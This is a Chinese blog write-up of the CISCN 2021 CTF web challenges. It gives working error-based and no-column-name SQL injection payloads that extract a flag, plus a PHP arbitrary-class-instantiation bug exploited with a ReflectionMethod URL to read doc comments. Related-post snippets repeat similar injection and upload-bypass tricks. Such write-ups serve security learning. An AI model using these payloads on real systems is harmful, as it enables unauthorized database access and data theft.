【WP】CISCN2021初赛-WEB部分

最新推荐文章于 2024-05-20 12:51:19 发布
最新推荐文章于 2024-05-20 12:51:19 发布
阅读量775 收藏 2
点赞数 2
分类专栏: # Web安全 # Write Up 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/117608646
版权

WEB

Easysql

模糊测试

发现columnsinformationunion(大小写)被过滤

在这里插入图片描述

报错回显点

UNION联合注入无法使用,测试登录发现报错点

在这里插入图片描述

回显位和库名

我们采用报错注入,用and做语法连接

// 测试列数
wyx123')and(select 1)#
// 爆破库名
wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))#
列名的猜解-无列名注入

当我们构造连接查询,对其加上using限制(using:连接查询的条件),当被连接的两个表包含名字完全相同的列时,当使用using,必须将所有的列名包含,否则会产生列名字的重复,系统无法处理产生报错。
当未包含全部出现重复的列名时,将会按照从左到右的顺序,每次一个的将列名列出(我们可以将目标库自己和自己连接)。

select * from (select * from demo1 a join (select * from demo1)b using(xxx))c;

在这里插入图片描述

前面被卡在了列名处

猜测表名为flag,猜测一个列名为id(后边用sqlmap验证了,存在id这一列),我们构造

在这里插入图片描述
在这里插入图片描述

// 利用报错注入爆破列名(第一步)
uname=wyx123')and(select%20extractvalue(1,concat(0x7e,(select * from(select * from flag a1 join (select * from flag) a2 using(id,no))a3))))#&passwd=2333&Submit=%E7%99%BB%E5%BD%95
-> no
// 利用报错注入爆破列名(第二步)
uname=wyx123')and(select%20extractvalue(1,concat(0x7e,(select * from(select * from flag a1 join (select * from flag) a2 using(id,no))a3))))#&passwd=2333&Submit=%E7%99%BB%E5%BD%95

-> `0d3bc3e9-2a27-4e93-a912-731a588ca07e`
爆破数据
wyx123')and(select updatexml(1,concat(0x7e,left((select `0d3bc3e9-2a27-4e93-a912-731a588ca07e` from flag),32),0x7e),1))#
// 前半段:CISCN{0nB2q-HgicN-WRaVM-H2Swj-R
wyx123')and(select updatexml(1,concat(0x7e,right((select `0d3bc3e9-2a27-4e93-a912-731a588ca07e` from flag),20),0x7e),1))#
// 后半段:~-WRaVM-H2Swj-RD7n3-}~
//合并: CISCN{0nB2q-HgicN-WRaVM-H2Swj-RD7n3-}

Easy_source

扫描目录

使用disearch和手写脚本扫描目录,发现index.php.swo备份文件

源代码
本题目没有其他代码了噢,就只有这一个文件,虽然你看到的不完全,但是你觉得我会把flag藏在哪里呢,仔细想想文件里面还有什么?
<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());
本地测试

生成对象,调用方法

$x=new User;
echo $x->d();

发现只是完成了一个输出的操作

类中的方法很多,而且最后使用了var_dump(),猜测是读取某个类对应的注释

$method= new $rc($ra, $rb);
var_dump($method->$rd());

且上述语句可以生成一个任意类对象,且可以调用一个方法,且参数可控。

方案

关于读取对象的注释,我们采用内置类 ReflectionMethod中的__toString或者getDocComment对函数进行读取

类和方法原型

$obj = new ReflectionClass(B::class);
$obj->getDocComment();	// 注释
$obj->__toString ()		//字符串对象

所以我们的构造目标

$method= new ReflectionClass('user', '对象方法');
var_dump($method->getDocComment());
本地测试2
/**
 * @doc this-is-a-test
 */
function c()
{
    return ++self::$c;
}

在这里插入图片描述
在这里插入图片描述

Payload
http://xxx.xxx.xxx?rc=ReflectionMethod&ra=User&rb=$$&rd=getDocComment

因为我们要指定对象的方法,才能看到对应方法上方的注释,所以我们要进行爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

車鈊
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
[CISCN2021]初赛
Huamang的博客
05-16 1985
easy_sql 无列名和报错注入 uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+ 出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307 uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2024
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
第十七届全国大学生信息安全竞赛创新实践能力赛初赛CISCN-2024部分WP
Welcome To Myon'Blog !
05-20 2019
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
第14届(2021)CISCN初赛WP(2)——Glass
InterplanetaryW的博客
06-15 370
Glass Writeup 首先使用apktool将“glass.apk”文件反编译 结果如下,提取其中Classes.dex文件 利用dex2jar工具进行反编译得到jar文件 生成jar包 使用jd-gui打开jar包,看到源码 核心判断函数如图所示 可以发现判断是利用checkFlag()函数 checkFlag为native外部函数 使用ida打开提取出的libnative-lib.so动态链接库 分析结束后可以在函数列表中很容易找到checkFlag()函数 使用F5进行反编译
CISCN2021初赛习得
Wawyw's Blog
05-18 562
Web 1、easy_sql 这里简要记录下我的思路以及学到的姿势。 一开始经过几次尝试发现uname处存在注入点且为单引号括号闭合,在sql语句为真时,返回 login ,为假时空白,于是就傻乎乎认为是布尔盲注,而忽略了加引号时页面会返回报错信息。所以可以用更为简单的报错注入的题,而我却用布尔盲注捣鼓了半天。得到库名后,发现information被过滤,无法查表和列名。艰难绕过后,利用无列名注入,mysql字符串逐位比较把flag给试了出来,但可能因为大小写的原因导致提交错误,白干一场(后来才知道mysq
国赛ciscn2024-WP-re6-gdb-debug(伪随机数保护)
最新发布
05-21
国赛ciscn2024-WP-re6-gdb_debug(伪随机数保护)
国赛ciscn2024-WP-re2-androidso-re(unidbg模拟执行Native层方法)
05-21
国赛ciscn2024-WP-re2-androidso_re(unidbg模拟执行Native层方法)
国赛ciscn2024-WP-re4-whereThel1b(动态调试Cpython的so文件)
05-21
国赛ciscn2024-WP-re4-whereThel1b(动态调试Cpython的so文件)
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP 解题报告 本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021WEB 部分中,我们遇到了一...
wordpress采集插件wp-autopost-pro专业版
01-28
**WordPress采集插件WP-Autopost-Pro专业版详解** WordPress作为全球最受欢迎的开源内容管理系统,拥有丰富的插件资源,其中WP-Autopost-Pro是一款高效的文章采集与发布工具,适用于那些希望自动化发布网络上相关...
ciscn2021CTF国赛pwn解
qq_39948058的博客
08-27 1291
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2021-CISCN-初赛 总结
Chmaz的博客
05-21 1000
第一次打ctf比赛,之前也没怎么做过题,果然被虐惨了,全队一个题也没做出来. 选择 几乎都看不懂,目前大一,专业知识几乎还未涉猎,还好是开卷,拿了625分. 杂项 Running_pixel 题目给了一个gif图 比赛时候想了很久,唯一能着手的点就是发现,gif每10帧图片会变色,但是就此思路就断了,怎么处理也没有什么思路. 其实当时一度离正确思路非常近, 当时我在第十帧经过处理后发现一个奇妙的点点.但是当时并没有多想. 结果正确思路就是把每十帧的图片对比每位像素,合在一张图上得到这样的图片,按顺序.
CISCN2021赛后复现
Atkx's Blog
05-21 1942
esay_sql 输入单引号报错 uname=admin&passwd=123456'&Submit=%E7%99%BB%E5%BD%95 #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1 sqlma
rsa special
axe
01-26 958
文章目录[ReSnAd] -- iqmp ipmq e,c,ϕ(n)\phi(n)ϕ(n)[RoarCTF2019]babyRSA -- wilson[NCTF2019]childRSA -- ϕ(p),ϕ(q)\phi(p),\phi(q)ϕ(p),ϕ(q)是多个小因子累乘[Crypto CTF] Time capsule [ReSnAd] – iqmp ipmq e,c,ϕ(n)\phi(n)...
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 775
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4370
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
ciscn2021-easy-sql无列名注入
soldi_er的博客
05-17 563
文章目录   登陆框。前端代码无信息。   部分黑名单字符:Union、Information、Sys、nno、column。   学到的东西: (1)Union的绕过,虽然比赛中绕不过去,但可以拓展绕过知识。 (2)查表的一些视图。 (3)无列名注入,通过表名可以查列名,无需union关键字。   前期报错注入,可以查到数据库名。 测试1:uname=1&passwd='。发现是MariaDB。 You have an error in your SQL syntax; check the ma
[CISCN2019 华东南赛区]Web4
cjdgg的博客
05-11 309
[CISCN2019 华东南赛区]Web4
wp-autopost-pro-3.7.8
07-14
### 回答1: wp-autopost-pro-3.7.8是一款WordPress插件,用于自动发布文章和内容到WordPress网站。它提供了一种便捷的方式来自动化发布内容,节省了博主的时间和精力。 该插件具有多种功能和特点。首先,它可以根据设定的规则自动从其他网站或特定源获取文章,并在指定的时间和日期自动发布到你的WordPress网站上。这样,你就可以轻松地保持你的网站更新和内容丰富。 另外,wp-autopost-pro-3.7.8还支持设置关键词过滤,可以根据关键词过滤来选择发布的文章。这对于博主来说,可以更好地控制发布的内容和选择适合自己网站主题的文章,提高网站的质量和可信度。 该插件还提供了一些额外的功能,如定时发布、文章摘要、添加标签和分类等。这些功能使得发布文章更加详细和便捷,可以更好地满足用户的需求和期望。 总的来说,wp-autopost-pro-3.7.8是一款强大的WordPress插件,为博主提供了自动发布文章和内容的功能。它可以帮助博主节省时间,提高工作效率,并且保持网站的内容更新和丰富。无论是个人博客还是商业网站,都可以受益于这个插件的使用。 ### 回答2: wp-autopost-pro-3.7.8是一款WordPress插件,它可以帮助网站管理员自动发布内容。 这个插件的主要功能是自动化发布文章。它可以根据设定的规则和时间表,在指定时间自动从指定来源获取文章,并发布到网站上。这样,管理员就不需要手动发布每一篇文章,节省了大量时间和精力。同时,自动发布还可以保证网站内容的更新频率,增加用户对网站的访问和黏性。 除了自动发布,wp-autopost-pro-3.7.8还具有其他实用的功能。例如,它可以自动设置文章的特色图片,使得网站的展示更加美观。它还支持自定义文章的摘要,可以帮助管理员快速浏览和分类文章。另外,插件还提供了灵活的设置选项,管理员可以根据自己的需求进行调整,以便达到最佳的发布效果。 需要注意的是,虽然自动发布能够帮助网站管理员省去繁琐的手动操作,但也需要管理员进行一定程度的监控。毕竟,自动化的程序难免会出现一些小问题,导致发布内容的质量不如手动发布。因此,管理员仍然需要关注和检查自动发布的文章,以确保其质量和准确性。 总之,wp-autopost-pro-3.7.8是一款功能强大的WordPress插件,可以帮助网站管理员自动化发布内容,提高工作效率。但在使用过程中,管理员仍然需要进行一定的监控和调整,以确保自动发布的文章质量。 ### 回答3: WP-AutoPost-Pro-3.7.8是一款用于WordPress网站的高级自动发布插件。该插件允许用户自动发布内容,而无需手动编辑和发布每篇文章。 WP-AutoPost-Pro-3.7.8具有许多强大的功能。首先,它支持多种自动发布方式,如RSS源、Google新闻、Twitter等。用户可以轻松地将这些来源与他们的网站相关的内容自动同步。 其次,该插件还具有高度可定制的选项,用户可以根据自己的需求定制发布规则、内容格式以及发布频率等。这样,用户可以根据自己的网站需求和目标受众来调整自动发布的方式,以达到更好的效果。 除此之外,该插件还支持关键词过滤和内容重写功能。用户可以设置关键词过滤器,只选择和自己网站相关的文章进行自动发布,避免发布与网站无关的内容。同时,插件还可以自动重写选定文章的内容,使其更加独特,避免内容重复问题。 最后,在使用WP-AutoPost-Pro-3.7.8时,用户还可以轻松监控和管理自动发布的内容。插件提供了详细的统计报告,用户可以随时了解每篇文章的发布情况。此外,用户可以对发布的文章进行管理,包括编辑、删除等。 总的来说,WP-AutoPost-Pro-3.7.8是一款功能强大的自动发布插件,可以帮助WordPress网站的管理员节省时间和精力,提高网站的内容更新效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值